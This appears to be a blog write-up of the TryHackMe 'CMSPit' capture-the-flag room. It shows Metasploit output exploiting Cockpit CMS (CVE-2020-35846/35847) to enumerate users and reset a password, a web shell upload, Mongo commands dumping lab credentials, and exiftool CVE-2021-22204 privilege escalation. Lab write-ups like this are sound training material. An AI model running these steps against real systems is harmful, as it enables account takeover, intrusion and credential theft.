Posts CMSPit
Post
Cancel

CMSPit

Salvador Aug 17 2021-08-17T10:49:14+08:00
1 min
Room CMSPit
Difficulty Medium
Type Web
Author stuxnet

Nmap

I was trying to find version in source code

1
2

curl http://10.10.35.116/auth/login?to=/auth/l | grep "0."
csfr : "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.dlnu8XjKIvB6mGfBlOgjtnixirAIsnzf5QTAEP1mJJc"

Found this https://swarm.ptsecurity.com/rce-cockpit-cms/ then this

## Metasploit

1
2
3
4
5
6
7

 msf6 exploit(multi/http/cockpit_cms_rce) > run

[*] Started reverse TCP handler on 10.9.148.82:4444 
[*] Attempting Username Enumeration (CVE-2020-35846)
[+]   Found users: ["admin", "darkStar7471", "skidy", "ekoparty"]
[-] Exploit aborted due to failure: bad-config: 10.10.35.116:80 - User to exploit required
[*] Exploit completed, but no session was created.

Users:

  • admin
  • darkStar741
  • skidy
  • ekoparty

change password adding user parameter (must run first with admin)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

msf6 exploit(multi/http/cockpit_cms_rce) > run

[*] Started reverse TCP handler on 10.9.148.82:4444 
[*] Obtaining reset tokens (CVE-2020-35847)
[*] Attempting to generate tokens
[*] Obtaining reset tokens (CVE-2020-35847)
[+]   Found tokens: ["rp-bb4521bba44ca116c94c71ac52302f8f610ae0d13493c"]
[*] Checking token: rp-bb4521bba44ca116c94c71ac52302f8f610ae0d13493c
[*] Obtaining user info
[*]   user: skidy
[*]   email: skidy@tryhackme.fakemail
[*]   active: true
[*]   group: admin
[*]   i18n: en
[*]   api_key: account-21ca3cfc400e3e565cfcb0e3f6b96d
[*]   password: $2y$10$sH3eBPcn3NLdg2mF8NbceOk7dZy4MEf2qnky4Byxi/MDKJRl9odwi
[*]   name: Skidy
[*]   _modified: 1621719311
[*]   _created: 1621719311
[*]   _id: 60a9790f393037a2e400006a
[*]   _reset_token: rp-bb4521bba44ca116c94c71ac52302f8f610ae0d13493c
[*]   md5email: 5dfac21f8549f298b8ee60e4b90c0e66
[+] Changing password to aVT3ukBAu8
[+] Password update successful
[*] Attempting login
[-] Exploit failed: ArgumentError wrong number of arguments (given 3, expected 1..2)
[*] Exploit completed, but no session was created.

upload shell as asset and open it using the link symbol

ss -tulnp 27017 is default port of Mongo database

extracr creds

1
2
3
4
5
6

mongo
show dbs
use sudouserbak
show collections
db.flag.find()
db.user.find()

{ “_id” : ObjectId(“60a89d0caadffb0ea68915f9”), “name” : “p4ssw0rdhack3d!123” } { “_id” : ObjectId(“60a89dfbaadffb0ea68915fa”), “name” : “stux” }

User: stux Password: p4ssw0rdhack3d!123

ssh into stux

use this tool to exploit https://github.com/convisoappsec/CVE-2021-22204-exiftool

just upload image an run sudo exiftool image.jpg

Writeup, TryHackMe
Web
Contents

-

RootMe